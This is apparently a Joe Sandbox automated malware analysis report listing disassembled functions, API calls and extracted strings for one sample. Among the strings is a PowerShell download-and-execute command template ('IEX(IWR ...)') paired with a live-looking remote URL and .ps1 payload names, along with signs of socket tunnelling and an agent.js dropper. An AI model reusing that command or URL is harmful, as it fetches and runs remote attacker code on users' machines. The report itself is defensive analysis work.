                • bfbkxdptzcljwinnfpjguspcvlgirgvdegdeqisttxcrywkudyppsifzvxs, xrefs: 00622BAF
                • nuotrqlghjnffzskkcwufalzlmyscmjdepuxlmxsvppqivxsccetooswpjxeizyhfgqglaeuxevfergpdysqykuppgggs, xrefs: 00622DA3
                • gcgcdlmeebjfufktvnrctczymerylzxsfqamppfwqjtheyqzdwlhj, xrefs: 00622ECF
                • bbiubmprfbqjoqmoqgmhttblufpjlpiycsqtnqcoidbvmqtfgcahfg, xrefs: 00622CFB
                • sqfyhcibiyaixyvseuhuztdlx, xrefs: 00622C6B
                • rvoctmqczfvawqbqstoqximnlajullkwbhpoyeksejkprviaewktleabpmhofo, xrefs: 00622DE8
                • jreqifbqorpfxictktaxizwicpwxilbgtncfyasmvhfyvtkowlhcd, xrefs: 00622E97
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: task$operator!=$char_traits
                • String ID: bbiubmprfbqjoqmoqgmhttblufpjlpiycsqtnqcoidbvmqtfgcahfg$bfbkxdptzcljwinnfpjguspcvlgirgvdegdeqisttxcrywkudyppsifzvxs$brdvmbhfixnfjkixadthcpzymiljlvidbiypcfxqaqvxdznkshnertbatlamlvhvlgiqevborbhuzis$ckedhkwnzqenzdyullzbnlnfpdmbxpbrmyhyhqfwzycsbmtpacpudhvlrkopimgkhhund$cynilnsopurpkzljbcyibniozvcvlhljsiueoaxlduusesgcbvealyqlqegiho$fuisqwdbksjnkwghhwh$gcgcdlmeebjfufktvnrctczymerylzxsfqamppfwqjtheyqzdwlhj$gcwignkebqvuaflqwaofoeamhtzhtayjmihwxiltntgdrauzzhbrgaocoaklskbiaxlskzepppflnzfykkxivzoa$jlsnfghtfqpdrihxdjmbpgukkyazsxnkrrfoklsrhiihyccjuobgwyiscunlu$jreqifbqorpfxictktaxizwicpwxilbgtncfyasmvhfyvtkowlhcd$nuotrqlghjnffzskkcwufalzlmyscmjdepuxlmxsvppqivxsccetooswpjxeizyhfgqglaeuxevfergpdysqykuppgggs$rhfqtvjgvstrbnxfbnisqywuttgleakvwhpeikxktmpncjovllsttlwtunsrbejgntaohynvb$rvoctmqczfvawqbqstoqximnlajullkwbhpoyeksejkprviaewktleabpmhofo$shtumcttjzvhu$sqfyhcibiyaixyvseuhuztdlx$syntqwezljesnhnfjaztdeotfzpejojodftab$upwxgfoqwdhvhqqbodaeivuwrsbjowftepjuayrfsskdseaqlqzsrzyylrwhxudritnoznhlmmukgfgilepjjfsxufyryctzs$yavuryeiymqfxujpmpqrmrmgttalagszlfjtclxxzlbqegipvgwbufy
                • API String ID: 1022754510-231213261
                • Opcode ID: a233d626034d585d238f95dc3321092859ecf0bbb947e389b7a1adf609c7bcaa
                • Instruction ID: 846ce5d649e43315782e841156d0f3dc35f0498528e3bb98b536d55d7288439d
                • Opcode Fuzzy Hash: a233d626034d585d238f95dc3321092859ecf0bbb947e389b7a1adf609c7bcaa
                • Instruction Fuzzy Hash: 90B13C70E10B18AADB40FF78DD17B9EBBB2AB16B00F40425DF5413B281DB7516448BE6
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: task$char_traitsoperator!=
                • String ID: -$P$[$ianh$lgorocmtlicgntojuhnxsyvwoxnzmsynfanydnuerqa$oyr
                • API String ID: 2802545854-2318821752
                • Opcode ID: 1bb3737d94369ae34245dce052da00f6442f8cda9f665df5f32ae237be090a8d
                • Instruction ID: 8b099d15119472304c5cade76087a6cc695b02a6fddbbbeba44b7b07c39d37f2
                • Opcode Fuzzy Hash: 1bb3737d94369ae34245dce052da00f6442f8cda9f665df5f32ae237be090a8d
                • Instruction Fuzzy Hash: F0716A70D04A78DADB24DB64D965BDEBBB2BF10304F10809DE045A7282DB791F89DF51
                APIs
                • ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 00E48591
                • ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 00E485A4
                • ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 00E485B7
                • GetFileAttributesW.KERNEL32(?), ref: 00E485DD
                • GetFileAttributesW.KERNEL32(?), ref: 00E485F6
                • lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 00E4860D
                • wnsprintfW.SHLWAPI ref: 00E48630
                • ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 00E48652
                Strings
                • %ComSpec%, xrefs: 00E485B2
                • sd4.ps1, xrefs: 00E48601
                • sd2.ps1, xrefs: 00E485E8
                • open, xrefs: 00E4864B
                • %SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe, xrefs: 00E4858C
                • /c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')", xrefs: 00E4861F
                • %SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe, xrefs: 00E4859F
                • https://kionaonline.com/modules/bonslick, xrefs: 00E4861A
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: EnvironmentExpandStrings$AttributesFile$ExecuteShelllstrcpywnsprintf
                • String ID: %ComSpec%$%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe$%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe$/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"$https://kionaonline.com/modules/bonslick$open$sd2.ps1$sd4.ps1
                • API String ID: 4132772799-999334212
                • Opcode ID: 44db291f95c248d3c480ca1956c5c62045cbf4b76aa6aa14624abd955146c0e2
                • Instruction ID: 2cda27731da10a038720e81c73d395718d2632325901e39899e4cfcbc82dbadb
                • Opcode Fuzzy Hash: 44db291f95c248d3c480ca1956c5c62045cbf4b76aa6aa14624abd955146c0e2
                • Instruction Fuzzy Hash: F821A57594031CAEDF20D768AC45FEA776CEB09714F0015D1EA58F20D0DBB4AAC98F91
                APIs
                • CreatePipe.KERNEL32(?,?,?,00000000), ref: 00E45753
                • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E457B1
                • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E457C4
                • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E457C9
                • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E457E0
                • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E457F7
                • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E45834
                • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E4585F
                • HeapAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E45862
                • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E4586D
                • HeapReAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E45870
                • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E458C7
                • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E458E3
                • CloseHandle.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E458E8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandleHeap$PipeProcess$AllocCreateNamedPeek$FileObjectReadSingleWait
                • String ID: D
                • API String ID: 2337985897-2746444292
                • Opcode ID: 1c3c06781e62bd852d3f9c52370b66bdf8fdab5e5eb2a7a8cea97b66b018aa5c
                • Instruction ID: 865cef9d62f17c6f624f1422660a420f320193b8c6565538967e6cd97326362e
                • Opcode Fuzzy Hash: 1c3c06781e62bd852d3f9c52370b66bdf8fdab5e5eb2a7a8cea97b66b018aa5c
                • Instruction Fuzzy Hash: 76519076A00219EFEB208FA5EC44BAF7BB9FB49704F244475E914F7291DB70D8098B60
                APIs
                • inet_pton.WS2_32(00000002,?,?), ref: 00E46310
                • htons.WS2_32(?), ref: 00E4632C
                • inet_pton.WS2_32(00000002,?,?), ref: 00E4633E
                • htons.WS2_32(?), ref: 00E46345
                • socket.WS2_32(00000002,00000001,00000006), ref: 00E46358
                • connect.WS2_32(00000000,?,00000010), ref: 00E46373
                • socket.WS2_32(00000002,00000001,00000006), ref: 00E46384
                • connect.WS2_32(00000000,?,00000010), ref: 00E46399
                • select.WS2_32(00000000,?), ref: 00E463C1
                • recv.WS2_32(?,?,00000400,00000000), ref: 00E463F4
                • send.WS2_32(00000000,?,00000000,00000000), ref: 00E4641A
                • select.WS2_32(00000000,00000002,00000000,00000000,00000000), ref: 00E4644C
                • closesocket.WS2_32(00000000), ref: 00E46462
                • closesocket.WS2_32(00000000), ref: 00E46469
                • GetProcessHeap.KERNEL32(00000000,?), ref: 00E46474
                • HeapFree.KERNEL32(00000000), ref: 00E4647B
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: Heapclosesocketconnecthtonsinet_ptonselectsocket$FreeProcessrecvsend
                • String ID:
                • API String ID: 1922096520-0
                • Opcode ID: 1d80a40a7de81724984adc6c16b655cacccfe0fb846de8f294964853ce92821a
                • Instruction ID: ffd5c17c5fc7903605ce4708c2bf413e14e78fb7f8fdd280cfe1146dc1d1f8c8
                • Opcode Fuzzy Hash: 1d80a40a7de81724984adc6c16b655cacccfe0fb846de8f294964853ce92821a
                • Instruction Fuzzy Hash: A1418F71144314AFD710DF659C89B6BB7E8BF89714F10091AF655E72D0D3B0D8498B62
                APIs
                • inet_pton.WS2_32(00000002,?,?), ref: 00E472F3
                • htons.WS2_32(?), ref: 00E472FE
                • socket.WS2_32(00000002,00000001,00000006), ref: 00E47316
                • connect.WS2_32(00000000,?,00000010), ref: 00E47334
                • recv.WS2_32(00000000,?,00000002,00000000), ref: 00E4734C
                • GetProcessHeap.KERNEL32(00000008,00000024), ref: 00E4736D
                • HeapAlloc.KERNEL32(00000000), ref: 00E47370
                • CreateThread.KERNEL32(00000000,00000000,Function_000062F0,00000000,00000000,00000000), ref: 00E473EB
                • CloseHandle.KERNEL32(00000000), ref: 00E473F6
                • recv.WS2_32(00000000,?,00000002,00000000), ref: 00E4740E
                • closesocket.WS2_32(00000000), ref: 00E4741D
                • GetProcessHeap.KERNEL32(00000000,?), ref: 00E47426
                • HeapFree.KERNEL32(00000000), ref: 00E47429
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E47443
                • HeapFree.KERNEL32(00000000), ref: 00E47446
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: Heap$Process$Freerecv$AllocCloseCreateHandleThreadclosesocketconnecthtonsinet_ptonsocket
                • String ID:
                • API String ID: 2784442062-0
                • Opcode ID: 0b1b1c02645581aad9780fff07df5e49c91d016358abc68437007eff48ca0450
                • Instruction ID: 14562ca76cbbc452d1c8b0f88c3ba7392658f6717c301c1469c8b071e3aff491
                • Opcode Fuzzy Hash: 0b1b1c02645581aad9780fff07df5e49c91d016358abc68437007eff48ca0450
                • Instruction Fuzzy Hash: 7D410638A08345AFEB209FB6AC49B6B7F68FF06705F041458F951FB282D370D84687A0
                APIs
                Strings
                • hcndlsldtwhpkrlbisuiflvfeofcd, xrefs: 00621EC5, 00621F07, 00621F24
                • fqcnfbsuagfcfmkulovbxmvizvobyurvsteowvzesefv, xrefs: 00621EF6
                • gbcuevkdwlyxwbzmpefkuoenueguybulmwuznauozbxusslsuijupaxueqkxsqzpcvloouwfhzpehzpgdgujbfb, xrefs: 00621EDD
                • `, xrefs: 00621F6C
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: task$char_traits
                • String ID: `$fqcnfbsuagfcfmkulovbxmvizvobyurvsteowvzesefv$gbcuevkdwlyxwbzmpefkuoenueguybulmwuznauozbxusslsuijupaxueqkxsqzpcvloouwfhzpehzpgdgujbfb$hcndlsldtwhpkrlbisuiflvfeofcd
                • API String ID: 1455298312-2158094500
                • Opcode ID: d9bf2b671ef44762c78ffd50aea4791e3c3f6c4d0f0732b7289191afca9a1f73
                • Instruction ID: f92ddbc760d794346da5d7aee2e89aa3277bbb3f2940be17dbf4b0798d2abf32
                • Opcode Fuzzy Hash: d9bf2b671ef44762c78ffd50aea4791e3c3f6c4d0f0732b7289191afca9a1f73
                • Instruction Fuzzy Hash: A8415A709047ACDADB04DBA4EA65BDDFBB2AF21704F50419DE0056B282DB791B08CFA5
                APIs
                • ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104), ref: 00E471D1
                • lstrlenW.KERNEL32(?), ref: 00E471DA
                • ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104), ref: 00E471F5
                • GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 00E47203
                • GetLastError.KERNEL32 ref: 00E4720D
                • ExpandEnvironmentStringsW.KERNEL32(%ProgramData%\agent.js,?,00000104), ref: 00E47224
                • wnsprintfW.SHLWAPI ref: 00E4723E
                • SetFileAttributesW.KERNEL32(?,00000006), ref: 00E4725E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: EnvironmentExpandStrings$AttributesDirectoryErrorFileLastSystemWow64lstrlenwnsprintf
                • String ID: "%s"$%ProgramData%\agent.js$%ProgramFiles%$%ProgramW6432%
                • API String ID: 457462216-4115850629
                • Opcode ID: 19ed835e8ebb7646108268fd7e3d4e03477e9500d482309a72a8493c0cb921c0
                • Instruction ID: f287bbd6f956e80631cd58ee8494a7e9f4e232bf25d0a6d18638ba9931ece01b
                • Opcode Fuzzy Hash: 19ed835e8ebb7646108268fd7e3d4e03477e9500d482309a72a8493c0cb921c0
                • Instruction Fuzzy Hash: 311152B5A4031CABDB20DBA1AC49EDA776CEB05704F4000A1A655F2090EBB4AAC98FD1
                APIs
                • ___free_lconv_mon.LIBCMT ref: 0062A108
                  • Part of subcall function 00629C2F: _free.LIBCMT ref: 00629C4C
                  • Part of subcall function 00629C2F: _free.LIBCMT ref: 00629C5E
                  • Part of subcall function 00629C2F: _free.LIBCMT ref: 00629C70
                  • Part of subcall function 00629C2F: _free.LIBCMT ref: 00629C82
                  • Part of subcall function 00629C2F: _free.LIBCMT ref: 00629C94
                  • Part of subcall function 00629C2F: _free.LIBCMT ref: 00629CA6
                  • Part of subcall function 00629C2F: _free.LIBCMT ref: 00629CB8
                  • Part of subcall function 00629C2F: _free.LIBCMT ref: 00629CCA
                  • Part of subcall function 00629C2F: _free.LIBCMT ref: 00629CDC
                  • Part of subcall function 00629C2F: _free.LIBCMT ref: 00629CEE
                  • Part of subcall function 00629C2F: _free.LIBCMT ref: 00629D00
                  • Part of subcall function 00629C2F: _free.LIBCMT ref: 00629D12
                  • Part of subcall function 00629C2F: _free.LIBCMT ref: 00629D24
                • _free.LIBCMT ref: 0062A0FD
                  • Part of subcall function 00627FB2: HeapFree.KERNEL32(00000000,00000000,?,00629DC0,?,00000000,?,?,?,00629DE7,?,00000007,?,?,0062A25B,?), ref: 00627FC8
                  • Part of subcall function 00627FB2: GetLastError.KERNEL32(?,?,00629DC0,?,00000000,?,?,?,00629DE7,?,00000007,?,?,0062A25B,?,?), ref: 00627FDA
                • _free.LIBCMT ref: 0062A11F
                • _free.LIBCMT ref: 0062A134
                • _free.LIBCMT ref: 0062A13F
                • _free.LIBCMT ref: 0062A161
                • _free.LIBCMT ref: 0062A174
                • _free.LIBCMT ref: 0062A182
                • _free.LIBCMT ref: 0062A18D
                • _free.LIBCMT ref: 0062A1C5
                • _free.LIBCMT ref: 0062A1CC
                • _free.LIBCMT ref: 0062A1E9
                • _free.LIBCMT ref: 0062A201
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID:
                • API String ID: 161543041-0
                • Opcode ID: 54777cde629483e480ba59ac4836439a1a6dde3ea701d54822a49471e4d3c2fe
                • Instruction ID: 79395b35669cab6caf660687e11dcfd9560bc7d95f5202092de2d10deec0de4d
                • Opcode Fuzzy Hash: 54777cde629483e480ba59ac4836439a1a6dde3ea701d54822a49471e4d3c2fe
                • Instruction Fuzzy Hash: C7315E31608A219FDB619A78E949B9AB7EAAF04320F10941DE454D7251DFB0BC90CF25
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: task$char_traitsoperator!=
                • String ID: $($0$8$W$nwntailncasvksrgvzxnrejxcyyxomjuszgkeftopscvymwbvxagssvvhfojrxjsepuidtjncng
                • API String ID: 2802545854-1628632686
                • Opcode ID: 8fe906f5b91ee345e94eccf161f615f3812688b5d99c311120524ce73cdd6b8f
                • Instruction ID: 387e4edde70ababe19558ed078c2646aa2b74b680b144657b54722b087e07ee8
                • Opcode Fuzzy Hash: 8fe906f5b91ee345e94eccf161f615f3812688b5d99c311120524ce73cdd6b8f
                • Instruction Fuzzy Hash: 11514771D04A69EBDB14CFA8E964BEDBBB2BB04304F10822DE401BB385DB795A45CF50
                APIs
                • EnterCriticalSection.KERNEL32(00E4A080), ref: 00E469E1
                • StrCmpNIA.SHLWAPI(?,?,00000000), ref: 00E46A1A
                • LeaveCriticalSection.KERNEL32(00E4A080,00000000), ref: 00E46A36
                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E46A90
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E46A97
                • LeaveCriticalSection.KERNEL32(00E4A080,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E46AAD
                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E46AC7
                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E46ACE
                • LeaveCriticalSection.KERNEL32(00E4A080,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E46ADF
                • GetProcessHeap.KERNEL32(00000008,?,?), ref: 00E46AEB
                • HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E46AF2
                • LeaveCriticalSection.KERNEL32(00E4A080), ref: 00E46B03
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: Heap$CriticalSection$Leave$Process$Alloc$EnterFree
                • String ID:
                • API String ID: 2132424838-0
                • Opcode ID: 6c6e593aa525a2f5a236bdbf72e78699bbd12b479e5ba851d57d84e0d6814d35
                • Instruction ID: 52a81edd49d2e0321407319400df50ba40fdb548b6421958479a3c0a4ddc857f
                • Opcode Fuzzy Hash: 6c6e593aa525a2f5a236bdbf72e78699bbd12b479e5ba851d57d84e0d6814d35
                • Instruction Fuzzy Hash: 8031E4756412019FE7249FB6FC4CB6A3B69FB87326F086439F016F2250CB70C44A8712
                APIs
                • _free.LIBCMT ref: 00628228
                  • Part of subcall function 00627FB2: HeapFree.KERNEL32(00000000,00000000,?,00629DC0,?,00000000,?,?,?,00629DE7,?,00000007,?,?,0062A25B,?), ref: 00627FC8
                  • Part of subcall function 00627FB2: GetLastError.KERNEL32(?,?,00629DC0,?,00000000,?,?,?,00629DE7,?,00000007,?,?,0062A25B,?,?), ref: 00627FDA
                • _free.LIBCMT ref: 00628234
                • _free.LIBCMT ref: 0062823F
                • _free.LIBCMT ref: 0062824A
                • _free.LIBCMT ref: 00628255
                • _free.LIBCMT ref: 00628260
                • _free.LIBCMT ref: 0062826B
                • _free.LIBCMT ref: 00628276
                • _free.LIBCMT ref: 00628281
                • _free.LIBCMT ref: 0062828F
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 650793e277db7cca20f9bf3ca7140a996f7eb021a020c34bb60b2057023817ef
                • Instruction ID: 4cd105a4b7d69cc1bcb267c1db9b564558f784c25a916d50fda268be2a92be8a
                • Opcode Fuzzy Hash: 650793e277db7cca20f9bf3ca7140a996f7eb021a020c34bb60b2057023817ef
                • Instruction Fuzzy Hash: 7221A976904518AFCB41EF94D981DDEBBBABF08340F0051AAF6159B221DB31EA94CF94
                APIs
                • type_info::operator==.LIBVCRUNTIME ref: 006254FA
                • ___TypeMatch.LIBVCRUNTIME ref: 00625608
                • _UnwindNestedFrames.LIBCMT ref: 0062575A
                • CallUnexpected.LIBVCRUNTIME ref: 00625775
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                • String ID: csm$csm$csm$G&
                • API String ID: 2751267872-2003760868
                • Opcode ID: 0f3740bb4b386ffc281a8da9ae7b113617e7a8c9241752018b4452859f20faf0
                • Instruction ID: b1aeecd7a80abd85466d38be455f8c27edc84eb600273fe4c313122e6776deeb
                • Opcode Fuzzy Hash: 0f3740bb4b386ffc281a8da9ae7b113617e7a8c9241752018b4452859f20faf0
                • Instruction Fuzzy Hash: 78B16A71800E29EFCF34DFA4E8819AEBBB6FF14310B14855AE8126B216D731DA51CF95
                APIs
                • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 00E47087
                • RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 00E470A3
                • GetProcessHeap.KERNEL32(00000008,?), ref: 00E470B2
                • HeapAlloc.KERNEL32(00000000), ref: 00E470B9
                • RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 00E470D6
                • RegCloseKey.ADVAPI32(80000002), ref: 00E470E8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
